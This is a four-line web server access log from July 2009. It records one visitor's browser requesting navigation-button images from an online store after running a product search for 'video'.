93.172.129.118 - - [26/Jul/2009:03:06:14 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:14 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:14 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:15 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
